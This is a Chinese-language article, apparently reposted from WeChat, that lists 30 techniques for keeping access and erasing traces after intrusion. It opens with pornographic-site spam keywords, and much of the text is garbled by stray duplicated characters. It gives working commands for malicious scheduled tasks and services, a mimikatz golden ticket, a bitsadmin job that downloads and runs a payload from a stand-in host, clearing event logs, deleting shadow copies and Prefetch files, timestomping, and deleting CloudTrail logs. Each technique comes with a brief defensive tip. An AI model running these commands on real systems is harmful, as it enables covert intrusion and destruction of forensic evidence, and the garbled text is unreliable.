超碰人人人人人,亚洲AV午夜福利精品一区二区,亚洲欧美综合区丁香五月1区,日韩欧美亚洲系列

在攻防對抗中，內(nèi)網(wǎng)橫向移動后的權(quán)限維持與痕跡清理是決定攻擊能否長期隱蔽的關(guān)鍵環(huán)節(jié)。本文將系統(tǒng)解析30種高價值技巧，覆蓋Windows/Linux系統(tǒng)、域環(huán)境及常見服務(wù)，并提供對應(yīng)的防御視角建議。

第一部分：權(quán)限維持15則

1. 1. 計劃任務(wù)偽裝
• ? 技術(shù)點：通過schtasks創(chuàng)建名稱類似系統(tǒng)服務(wù)（如MicrosoftEdgeUpdate）的定時任務(wù)，觸發(fā)后門執(zhí)行。
• ? 操作：schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:\malware.exe" /sc hourly
• ? 防御：監(jiān)控計劃任務(wù)中非微軟簽名的程序路徑。
2. 2. 服務(wù)注入
• ? 技術(shù)點：劫持合法服務(wù)（如Print Spooler）的二進(jìn)制路徑指向惡意負(fù)載。
• ? 操作：sc config spooler binPath= "C:\Windows\System32\mal.dll"
• ? 防御：啟用服務(wù)簽名驗證（RequireSignedServiceBinaries）。
3. 3. 注冊表自啟動項
• ? 技術(shù)點：修改HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM對應(yīng)項。
• ? 隱蔽性：使用CLSID混淆鍵名（如{AB3D1234-...}）。
• ? 防御：部署注冊表變更告警規(guī)則。
4. 4. 啟動文件夾植入
• ? 技術(shù)點：將惡意快捷方式（.lnk）放入%AppData%\Microsoft\Windows\Start Menu\Programs\Startup。
• ? 繞過：利用.url文件偽裝為合法文檔。
• ? 防御：限制用戶目錄寫入權(quán)限。
5. 5. WMI事件訂閱
• ? 技術(shù)點：注冊WMI事件過濾器（如用戶登錄觸發(fā)后門）。
• ? 腳本：

  $filterArgs = @{ EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" }  
  $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }  

• ? 防御：定期審計__EventFilter/__EventConsumer類。
6. 6. 影子賬戶創(chuàng)建
• ? 技術(shù)點：通過注冊表添加隱藏賬戶（F值修改為0x3e9）。
• ? 操作：

  reg add "HKLM\SAM\SAM\Domains\Account\Users\000003E9" /v F /t REG_BINARY /d ...  

• ? 防御：檢查SAM中用戶RID是否連續(xù)。
7. 7. 黃金票據(jù)（Golden Ticket）
• ? 技術(shù)點：利用域控的KRBTGT哈希偽造TGT票據(jù)。
• ? 生成：

  kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt  

• ? 防御：定期重置KRBTGT密碼（每180天）。
8. 8. ACL后門
• ? 技術(shù)點：為關(guān)鍵進(jìn)程（如LSASS.exe）添加調(diào)試權(quán)限。
• ? 操作：

  Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow  

• ? 防御：監(jiān)控敏感進(jìn)程的ACL變更。
9. 9. DLL劫持
• ? 技術(shù)點：替換系統(tǒng)目錄（如C:\Windows\System32\）中未簽名的DLL。
• ? 優(yōu)先級：利用DLL搜索順序劫持應(yīng)用程序。
• ? 防御：啟用DLL簽名強制驗證（CIG功能）。
10. 10. RID劫持攻擊
• ? 技術(shù)點：修改低權(quán)限用戶的RID為500（管理員RID）。
• ? 操作：通過mimikatz調(diào)整注冊表F字段。
• ? 防御：檢查用戶SID與RID的合法性。
11. 11. COM劫持
• ? 技術(shù)點：注冊惡意COM組件劫持MMC或Office調(diào)用鏈。
• ? 注冊表路徑：HKCR\CLSID\{...}\InprocServer32
• ? 防御：禁用未簽名的COM組件加載。
12. 12. Hook注入（API Hooking）
• ? 技術(shù)點：注入WS2_32.dll的connect函數(shù)實現(xiàn)網(wǎng)絡(luò)通信重定向。
• ? 工具：使用Detours庫實現(xiàn)函數(shù)劫持。
• ? 防御：啟用驅(qū)動簽名驗證（DSE）。
13. 13. Bits Jobs持久化
• ? 技術(shù)點：利用后臺智能傳輸服務(wù)（BITS）下載惡意負(fù)載。
• ? 命令：

  bitsadmin /create backdoor  
  bitsadmin /addfile backdoor http://mal.com/payload.exe C:\temp\svchost.exe  
  bitsadmin /SetNotifyCmdLine backdoor C:\temp\svchost.exe NULL  

• ? 防御：審核BITS任務(wù)列表。
14. 14. 域信任關(guān)系濫用
• ? 技術(shù)點：在跨域信任場景中利用SID History屬性提權(quán)。
• ? 操作：使用mimikatz添加域控的SID至用戶屬性。
• ? 防御：禁用不必要的域信任關(guān)系。
15. 15. Office宏持久化
• ? 技術(shù)點：在Normal.dotm模板中嵌入惡意宏代碼。
• ? 觸發(fā)：用戶啟動Word時自動執(zhí)行。
• ? 防御：啟用宏執(zhí)行限制（僅允許簽名宏）。

第二部分：痕跡清理15則

1. 16. Windows事件日志清除
• ? 工具：wevtutil cl Security（需管理員權(quán)限）。
• ? 對抗：使用內(nèi)存注入技術(shù)直接操作eventlog.service進(jìn)程。
• ? 防御：啟用日志轉(zhuǎn)發(fā)至SIEM系統(tǒng)。
2. 17. IIS日志擦除
• ? 路徑：C:\inetpub\logs\LogFiles\W3SVC1\。
• ? 技巧：僅刪除特定時間段的日志條目（避免全量刪除引發(fā)懷疑）。
• ? 防御：配置日志文件ACL為只讀。
3. 18. 防火墻規(guī)則恢復(fù)
• ? 操作：刪除新增的放行規(guī)則（netsh advfirewall firewall delete rule name="mal_rule"）。
• ? 隱蔽：復(fù)用已有規(guī)則名稱（如Remote Desktop）。
• ? 防御：基線化防火墻規(guī)則并監(jiān)控變更。
4. 19. 文件時間戳偽造
• ? 工具：timestomp.exe -m "01/01/2020 08:00:00" malware.exe。
• ? 匹配：將時間戳與系統(tǒng)文件（如notepad.exe）保持一致。
• ? 防御：啟用文件完整性監(jiān)控（FIM）。
5. 20. 內(nèi)存痕跡清除
• ? 技術(shù)點：卸載惡意驅(qū)動后調(diào)用ExAllocatePool覆蓋內(nèi)存區(qū)域。
• ? 工具：使用BOF（Beacon Object Files）實現(xiàn)無文件擦除。
• ? 防御：部署內(nèi)存掃描工具（如Elastic Endpoint）。
6. 21. 回收站繞過刪除
• ? 命令：del /f /q /s *.*配合shift+delete徹底清除。
• ? 增強：使用cipher /w:C:覆寫磁盤空閑空間。
• ? 防御：審計敏感目錄的文件刪除操作。
7. 22. 預(yù)讀取文件清理
• ? 路徑：C:\Windows\Prefetch\中.pf文件。
• ? 操作：定期執(zhí)行del /f /q C:\Windows\Prefetch\*.pf。
• ? 防御：禁用預(yù)讀取功能（需評估性能影響）。
8. 23. 卷影副本刪除
• ? 命令：vssadmin delete shadows /all /quiet。
• ? 對抗：在提權(quán)后優(yōu)先刪除卷影防止取證恢復(fù)。
• ? 防御：限制vssadmin執(zhí)行權(quán)限。
9. 24. RDP連接記錄清除
• ? 注冊表路徑：HKCU\Software\Microsoft\Terminal Server Client\Servers。
• ? 自動化：編寫腳本批量刪除歷史IP記錄。
• ? 防御：啟用RDP連接日志審計。
10. 25. 瀏覽器歷史痕跡清理
• ? 工具：使用BrowsingHistoryView導(dǎo)出并刪除Chrome/Firefox記錄。
• ? 進(jìn)階：劫持瀏覽器擴展自動清理歷史（如惡意插件）。
• ? 防御：監(jiān)控瀏覽器進(jìn)程的異常行為。
11. 26. PowerShell日志繞過
• ? 技術(shù)點：通過-WindowStyle Hidden -ExecutionPolicy Bypass隱藏執(zhí)行窗口。
• ? 日志清除：刪除Microsoft-Windows-PowerShell%4Operational.evtx。
• ? 防御：啟用模塊日志記錄（ScriptBlockLogging）。
12. 27. WMI日志清理
• ? 路徑：Applications and Services Logs\Microsoft\Windows\WMI-Activity。
• ? 難點：需停止Winmgmt服務(wù)后操作日志文件。
• ? 防御：啟用WMI活動審計策略。
13. 28. Linux utmp/wtmp清理
• ? 文件：/var/run/utmp、/var/log/wtmp。
• ? 命令：使用utmpdump工具編輯登錄記錄。
• ? 防御：配置ttylog實時記錄會話內(nèi)容。
14. 29. 數(shù)據(jù)庫日志截斷
• ? MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';
• ? MSSQL：執(zhí)行EXEC sp_cycle_errorlog;循環(huán)日志文件。
• ? 防御：啟用數(shù)據(jù)庫審計并異地存儲日志。
15. 30. 云平臺日志覆蓋
• ? AWS：通過DeleteLogGroup刪除CloudTrail日志組。
• ? Azure：使用Remove-AzLogProfile清除活動日志配置。
• ? 防御：啟用云日志不可變性（Immutable Storage）。

防御方建議

• ? 權(quán)限維持檢測：部署EDR監(jiān)控進(jìn)程樹異常、注冊表關(guān)鍵路徑變更及服務(wù)簽名異常。
• ? 痕跡清理對抗：實施日志多副本存儲（本地+云端+物理設(shè)備），使用AI分析日志完整性。
• ? 紅隊驗證：定期模擬攻擊驗證防御體系有效性，重點關(guān)注上述30項技術(shù)的防護(hù)盲區(qū)。

閱讀原文：https://mp.weixin.qq.com/s/KHNbBR3WAjDGaLGvRZoUwQ